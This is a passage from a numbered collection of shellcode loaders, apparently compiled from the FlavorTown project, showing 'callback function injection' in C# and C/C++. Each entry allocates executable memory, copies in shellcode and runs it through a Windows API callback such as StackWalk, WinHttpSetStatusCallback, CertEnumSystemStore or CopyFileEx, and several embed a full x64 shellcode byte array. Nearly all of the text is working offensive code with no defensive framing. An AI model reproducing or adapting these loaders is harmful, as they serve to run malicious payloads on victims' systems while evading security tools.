71 [FieldOffset(0)] public Int64 QuadPart;
72 [FieldOffset(0)] public UInt32 LowPart;
73 [FieldOffset(4)] public Int32 HighPart;
74 }
75
76 [DllImport("kernel32.dll")]
77 static extern bool SetWaitableTimer(IntPtr hTimer,
78 ref LARGE_INTEGER pDueTime,
79 int lPeriod,
80 IntPtr pfnCompletionRoutine,
81 IntPtr lpArgToCompletionRoutine,
82 bool fResume);
83
84 [DllImport("kernel32.dll")]
85 static extern int SleepEx(
86 UInt32 dwMilliseconds,
87 bool bAlertable);
88 }
89}
15.回调函数注入 (C#) 通过 StackWalk
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace StackWalk
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: StackWalk.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39
40 uint IMAGE_FILE_MACHINE_AMD64 = 0x8664;
41 STACKFRAME sStackFrame = new STACKFRAME();
42 CONTEXT64 sContext = new CONTEXT64();
43
44 StackWalk(IMAGE_FILE_MACHINE_AMD64, Process.GetCurrentProcess().Handle, IntPtr.Zero, ref sStackFrame, ref sContext, IntPtr.Zero, hAlloc, IntPtr.Zero, IntPtr.Zero);
45
46 }
47
48 [DllImport("kernel32")]
49 static extern IntPtr VirtualAlloc(
50 IntPtr lpAddress,
51 uint dwSize,
52 uint flAllocationType,
53 uint flProtect);
54
55 [DllImport("kernel32.dll")]
56 static extern bool VirtualProtectEx(
57 IntPtr hProcess,
58 IntPtr lpAddress,
59 int dwSize,
60 uint flNewProtect,
61 out uint lpflOldProtect);
62
63 [DllImport("DbgHelp.dll")]
64 static extern bool StackWalk(
65 uint MachineType,
66 IntPtr hProcess,
67 IntPtr hThread,
68 ref STACKFRAME StackFrame,
69 ref CONTEXT64 ContextRecord,
70 IntPtr ReadMemoryRoutine,
71 IntPtr FunctionTableAccessRoutine,
72 IntPtr GetModuleBaseRoutine,
73 IntPtr TranslateAddress);
74
75 public enum CONTEXT_FLAGS : uint
76 {
77 CONTEXT_i386 = 0x10000,
78 CONTEXT_i486 = 0x10000, // same as i386
79 CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
80 CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
81 CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
82 CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
83 CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
84 CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
85 CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
86 CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
87 }
88
89 [StructLayout(LayoutKind.Sequential)]
90 public struct FLOATING_SAVE_AREA
91 {
92 public uint ControlWord;
93 public uint StatusWord;
94 public uint TagWord;
95 public uint ErrorOffset;
96 public uint ErrorSelector;
97 public uint DataOffset;
98 public uint DataSelector;
99 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
100 public byte[] RegisterArea;
101 public uint Cr0NpxState;
102 }
103
104 [StructLayout(LayoutKind.Sequential)]
105 public struct CONTEXT
106 {
107 public uint ContextFlags; //set this to an appropriate value
108 // Retrieved by CONTEXT_DEBUG_REGISTERS
109 public uint Dr0;
110 public uint Dr1;
111 public uint Dr2;
112 public uint Dr3;
113 public uint Dr6;
114 public uint Dr7;
115 // Retrieved by CONTEXT_FLOATING_POINT
116 public FLOATING_SAVE_AREA FloatSave;
117 // Retrieved by CONTEXT_SEGMENTS
118 public uint SegGs;
119 public uint SegFs;
120 public uint SegEs;
121 public uint SegDs;
122 // Retrieved by CONTEXT_INTEGER
123 public uint Edi;
124 public uint Esi;
125 public uint Ebx;
126 public uint Edx;
127 public uint Ecx;
128 public uint Eax;
129 // Retrieved by CONTEXT_CONTROL
130 public uint Ebp;
131 public uint Eip;
132 public uint SegCs;
133 public uint EFlags;
134 public uint Esp;
135 public uint SegSs;
136 // Retrieved by CONTEXT_EXTENDED_REGISTERS
137 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
138 public byte[] ExtendedRegisters;
139 }
140
141 // Next x64
142
143 [StructLayout(LayoutKind.Sequential)]
144 public struct M128A
145 {
146 public ulong High;
147 public long Low;
148
149 public override string ToString()
150 {
151 return string.Format("High:{0}, Low:{1}", this.High, this.Low);
152 }
153 }
154
155 /// <summary>
156 /// x64
157 /// </summary>
158 [StructLayout(LayoutKind.Sequential, Pack = 16)]
159 public struct XSAVE_FORMAT64
160 {
161 public ushort ControlWord;
162 public ushort StatusWord;
163 public byte TagWord;
164 public byte Reserved1;
165 public ushort ErrorOpcode;
166 public uint ErrorOffset;
167 public ushort ErrorSelector;
168 public ushort Reserved2;
169 public uint DataOffset;
170 public ushort DataSelector;
171 public ushort Reserved3;
172 public uint MxCsr;
173 public uint MxCsr_Mask;
174
175 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
176 public M128A[] FloatRegisters;
177
178 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
179 public M128A[] XmmRegisters;
180
181 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
182 public byte[] Reserved4;
183 }
184
185 /// <summary>
186 /// x64
187 /// </summary>
188 [StructLayout(LayoutKind.Sequential, Pack = 16)]
189 public struct CONTEXT64
190 {
191 public ulong P1Home;
192 public ulong P2Home;
193 public ulong P3Home;
194 public ulong P4Home;
195 public ulong P5Home;
196 public ulong P6Home;
197
198 public CONTEXT_FLAGS ContextFlags;
199 public uint MxCsr;
200
201 public ushort SegCs;
202 public ushort SegDs;
203 public ushort SegEs;
204 public ushort SegFs;
205 public ushort SegGs;
206 public ushort SegSs;
207 public uint EFlags;
208
209 public ulong Dr0;
210 public ulong Dr1;
211 public ulong Dr2;
212 public ulong Dr3;
213 public ulong Dr6;
214 public ulong Dr7;
215
216 public ulong Rax;
217 public ulong Rcx;
218 public ulong Rdx;
219 public ulong Rbx;
220 public ulong Rsp;
221 public ulong Rbp;
222 public ulong Rsi;
223 public ulong Rdi;
224 public ulong R8;
225 public ulong R9;
226 public ulong R10;
227 public ulong R11;
228 public ulong R12;
229 public ulong R13;
230 public ulong R14;
231 public ulong R15;
232 public ulong Rip;
233
234 public XSAVE_FORMAT64 DUMMYUNIONNAME;
235
236 [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
237 public M128A[] VectorRegister;
238 public ulong VectorControl;
239
240 public ulong DebugControl;
241 public ulong LastBranchToRip;
242 public ulong LastBranchFromRip;
243 public ulong LastExceptionToRip;
244 public ulong LastExceptionFromRip;
245 }
246
247 public struct STACKFRAME
248 {
249 public IntPtr AddrPC;
250 public IntPtr AddrReturn;
251 public IntPtr AddrFrame;
252 public IntPtr AddrStack;
253 public IntPtr FuncTableEntry;
254 public uint Params;
255 public bool Far;
256 public bool Virtual;
257 public uint Reserved;
258 public IntPtr KDHELP64;
259 public IntPtr AddrBStore;
260 }
261 }
262}
16.回调函数注入 (C#) 通过 SymRegisterCallback
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace SymRegisterCallback
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: SymRegisterCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hProcess = Process.GetCurrentProcess().Handle;
40 SymInitialize(hProcess, String.Empty, false);
41 SymRegisterCallback(hProcess, hAlloc, IntPtr.Zero);
42 SymRefreshModuleList(hProcess);
43 }
44
45 [DllImport("kernel32")]
46 static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("DbgHelp.dll")]
61 static extern bool SymInitialize(
62 IntPtr hProcess,
63 string UserSearchPath,
64 bool fInvadeProcess);
65
66 [DllImport("DbgHelp.dll")]
67 static extern bool SymRegisterCallback(
68 IntPtr hProcess,
69 IntPtr hCallback,
70 IntPtr UserContext);
71
72 [DllImport("DbgHelp.dll")]
73 static extern bool SymRefreshModuleList(IntPtr hProcess);
74 }
75}
17.回调函数注入 (C#) 通过 WinHttpSetStatusCallback
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace WinHttpSetStatusCallback
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: WinHttpSetStatusCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0;
40 string WINHTTP_NO_PROXY_NAME = null;
41 string WINHTTP_NO_PROXY_BYPASS = null;
42
43 IntPtr hSession = WinHttpOpen(null, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
44
45 uint WINHTTP_CALLBACK_FLAG_ALL_NOTIFICATIONS = 0xFFFFFFFF;
46 WinHttpSetStatusCallback(hSession, hAlloc, WINHTTP_CALLBACK_FLAG_ALL_NOTIFICATIONS, IntPtr.Zero);
47
48 WinHttpConnect(hSession, "localhost", 80, 0);
49 }
50
51 [DllImport("kernel32")]
52 static extern IntPtr VirtualAlloc(
53 IntPtr lpAddress,
54 uint dwSize,
55 uint flAllocationType,
56 uint flProtect);
57
58 [DllImport("kernel32.dll")]
59 static extern bool VirtualProtectEx(
60 IntPtr hProcess,
61 IntPtr lpAddress,
62 int dwSize,
63 uint flNewProtect,
64 out uint lpflOldProtect);
65
66 [DllImport("Winhttp.dll", SetLastError = true)]
67 static extern IntPtr WinHttpOpen(
68 string pszAgent,
69 uint dwAccessType,
70 string pszProxyW,
71 string pszProxyBypass,
72 uint dwFlags);
73
74 [DllImport("Winhttp.dll", SetLastError = true)]
75 static extern IntPtr WinHttpSetStatusCallback(
76 IntPtr hInternet,
77 IntPtr lpfnInternetCallback,
78 uint dwNotificationFlags,
79 IntPtr dwReserved);
80
81 [DllImport("winhttp.dll", SetLastError = true)]
82 static extern IntPtr WinHttpConnect(IntPtr hSession,
83 string pswzServerName,
84 short nServerPort,
85 int dwReserved);
86
87 }
88}
18.回调函数注入 通过 CDefFolderMenu_Create2
1// Wra7h/FlavorTown
2// Written/Compiled: Visual Studio 2022
3// Usage: this.exe <shellcode file>
4#pragma comment(lib, "Shell32.lib")
5
6#include <stdio.h>
7#include <Windows.h>
8#include <shlobj_core.h>
9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 if (argc != 2)
19 {
20 printf("Usage: CDefFolderMenu_Create2.exe C:\\Path\\To\\Shellcode.bin");
21 goto CLEANUP;
22 }
23
24 //Read shellcode and setup
25 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
26 if (!Ret)
27 goto CLEANUP;
28
29 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
30 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
31
32 memcpy(hAlloc, Shellcode, SCLen);
33
34 PVOID ICM = NULL;
35 CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)hAlloc, 0, NULL, &ICM);
36
37CLEANUP:
38 if (Shellcode)
39 free(Shellcode);
40
41 return 0;
42}
43
44BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
45{
46 FILE* f = NULL;
47 _wfopen_s(&f, Filepath, L"rb");
48 if (f)
49 {
50 fseek(f, 0, SEEK_END);
51 *BufferSize = ftell(f);
52 fseek(f, 0, SEEK_SET);
53 *Buffer = malloc(*BufferSize);
54 fread(*Buffer, *BufferSize, 1, f);
55 fclose(f);
56 }
57
58 return (*BufferSize != 0) ? TRUE : FALSE;
59}
19.回调函数注入 通过 CertEnumSystemStore
1#include <windows.h>
2#include <stdio.h>
3#include <wincrypt.h>
4
5// Requires Crypt32.lib
6
7// alfarom256 calc shellcode
8unsigned char op[] =
9"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
10"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
11"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
12"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
13"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
14"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
15"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
16"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
17"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
18"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
19"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
20"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
21"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
22"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
23"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
24"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
25"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
26"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
27"\x63\x2e\x65\x78\x65\x00";
28
29
30
31int main() {
32
33
34 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
35 ::RtlMoveMemory(addr, op, sizeof(op));
36
37 ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr);
38
39
40}
20.回调函数注入 通过 CertEnumSystemStoreLocation
1#include <windows.h>
2#include <stdio.h>
3#include <wincrypt.h>
4
5// requires Crypt32.lib
6
7
8// alfarom256 calc shellcode
9unsigned char op[] =
10"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
11"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
12"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
13"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
14"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
15"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
16"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
17"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
18"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
19"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
20"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
21"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
22"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
23"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
24"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
25"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
26"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
27"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
28"\x63\x2e\x65\x78\x65\x00";
29
30
31
32int main() {
33
34
35 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
36 ::RtlMoveMemory(addr, op, sizeof(op));
37
38 ::CertEnumSystemStoreLocation(NULL, nullptr, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)addr);
39
40}
21.回调函数注入 通过 CertFindChainInStore
1// Wra7h/FlavorTown
2// Written/Compiled: Visual Studio 2022
3// Usage: this.exe <shellcode file>
4#pragma comment(lib, "Crypt32.lib")
5
6#include <stdio.h>
7#include <windows.h>
8#include <wincrypt.h>
9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 HCERTSTORE hCertStore = NULL;
19 CERT_CHAIN_FIND_ISSUER_PARA sCCFIP = { 0 };
20
21 if (argc != 2)
22 {
23 printf("Usage: CertFindChainInStore.exe C:\\Path\\To\\Shellcode.bin");
24 goto CLEANUP;
25 }
26
27 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
28 if (!Ret)
29 goto CLEANUP;
30
31 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
32 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
33
34 memcpy(hAlloc, Shellcode, SCLen);
35
36 hCertStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, L"My");
37
38 sCCFIP.pfnFindCallback = (PFN_CERT_CHAIN_FIND_BY_ISSUER_CALLBACK)hAlloc;
39 sCCFIP.cbSize = sizeof(CERT_CHAIN_FIND_ISSUER_PARA);
40
41 CertFindChainInStore(hCertStore, X509_ASN_ENCODING, 0, CERT_CHAIN_FIND_BY_ISSUER, &sCCFIP, NULL);
42
43CLEANUP:
44 if (Shellcode)
45 free(Shellcode);
46
47 if (hCertStore)
48 CertCloseStore(hCertStore, 0);
49
50 return 0;
51}
52
53BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
54{
55 FILE* f = NULL;
56 _wfopen_s(&f, Filepath, L"rb");
57 if (f)
58 {
59 fseek(f, 0, SEEK_END);
60 *BufferSize = ftell(f);
61 fseek(f, 0, SEEK_SET);
62 *Buffer = malloc(*BufferSize);
63 fread(*Buffer, *BufferSize, 1, f);
64 fclose(f);
65 }
66
67 return (*BufferSize != 0) ? TRUE : FALSE;
68}
22.回调函数注入 通过 CopyFile2
1#include <windows.h>
2#include <stdio.h>
3#include <dpa_dsa.h>
4
5
6int err(const char* errmsg) {
7
8
9 printf("Error: %s (%u)\n", errmsg, ::GetLastError());
10 return 1;
11
12}
13
14
15// alfarom256 calc shellcode
16unsigned char op[] =
17"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
18"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
19"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
20"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
21"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
22"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
23"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
24"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
25"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
26"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
27"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
28"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
29"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
30"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
31"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
32"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
33"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
34"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
35"\x63\x2e\x65\x78\x65\x00";
36
37
38
39int main() {
40
41
42 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43 ::RtlMoveMemory(addr, op, sizeof(op));
44
45 COPYFILE2_EXTENDED_PARAMETERS params;
46
47 params.dwSize = { sizeof(params) };
48 params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS;
49 params.pfCancel = FALSE;
50 params.pProgressRoutine = (PCOPYFILE2_PROGRESS_ROUTINE)addr;
51 params.pvCallbackContext = nullptr;
52
53 ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log");
54 ::CopyFile2(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", ¶ms);
55
56}
23.回调函数注入 通过 CopyFileEx
1#include <windows.h>
2#include <stdio.h>
3
4// alfarom256 calc shellcode
5unsigned char op[] =
6"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
7"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
8"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
9"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
10"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
11"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
12"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
13"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
14"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
15"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
16"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
17"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
18"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
19"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
20"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
21"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
22"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
23"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
24"\x63\x2e\x65\x78\x65\x00";
25
26
27
28int main() {
29
30
31 LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
32 ::RtlMoveMemory(addr, op, sizeof(op));
33
34 ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log");
35 ::CopyFileExW(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", (LPPROGRESS_ROUTINE)addr, NULL, FALSE, COPY_FILE_FAIL_IF_EXISTS);
36
37}
24.回调函数注入 通过 CopyFileTransacted
1// Wra7h/FlavorTown
2// Written/Compiled: Visual Studio 2022
3// Usage: this.exe <shellcode file>
4#pragma comment(lib, "KtmW32.lib")
5
6#include <stdio.h>
7#include <windows.h>
8#include <ktmw32.h>
9
10BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
11
12INT wmain(INT argc, WCHAR* argv[])
13{
14 BOOL Ret = FALSE;
15 DWORD SCLen = 0;
16 PCHAR Shellcode = NULL;
17
18 HANDLE hFile = NULL;
19 HANDLE hTransaction = NULL;
20
21 if (argc != 2)
22 {
23 printf("Usage: CopyFileTransacted.exe C:\\Path\\To\\Shellcode.bin");
24 goto CLEANUP;
25 }
26
27 //Read shellcode and setup
28 Ret = ReadContents(argv[1], &Shellcode, &SCLen);
29 if (!Ret)
30 goto CLEANUP;
31
32 PVOID hAlloc = VirtualAlloc(NULL, SCLen,
33 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
34
35 memcpy(hAlloc, Shellcode, SCLen);
36
37 //Create a file to copy
38 hFile = CreateFile(L"C:\\Windows\\Temp\\Blank.txt", FILE_READ_DATA, FILE_SHARE_READ,
39 NULL, OPEN_ALWAYS, 0, NULL);
40
41 CloseHandle(hFile);
42
43 //Create copy transaction
44 hTransaction = CreateTransaction(NULL, NULL, NULL, NULL, NULL, NULL, NULL);
45
46 CopyFileTransacted(L"C:\\Windows\\Temp\\Blank.txt", L"C:\\Windows\\Temp\\Blankagain.txt",
47 (LPPROGRESS_ROUTINE)hAlloc, NULL, FALSE, 0x0, hTransaction);
48
49 //Execute
50 CommitTransaction(hTransaction);
51
52 //Delete the files
53 DeleteFile(L"C:\\Windows\\Temp\\Blank.txt");
54 DeleteFile(L"C:\\Windows\\Temp\\Blankagain.txt");
55
56CLEANUP:
57 if (Shellcode)
58 free(Shellcode);
59
60 if (hTransaction)
61 CloseHandle(hTransaction);
62
63 return 0;
64}
65
66BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
67{
68 FILE* f = NULL;
69 _wfopen_s(&f, Filepath, L"rb");
70 if (f)
71 {
72 fseek(f, 0, SEEK_END);
73 *BufferSize = ftell(f);
74 fseek(f, 0, SEEK_SET);
75 *Buffer = malloc(*BufferSize);
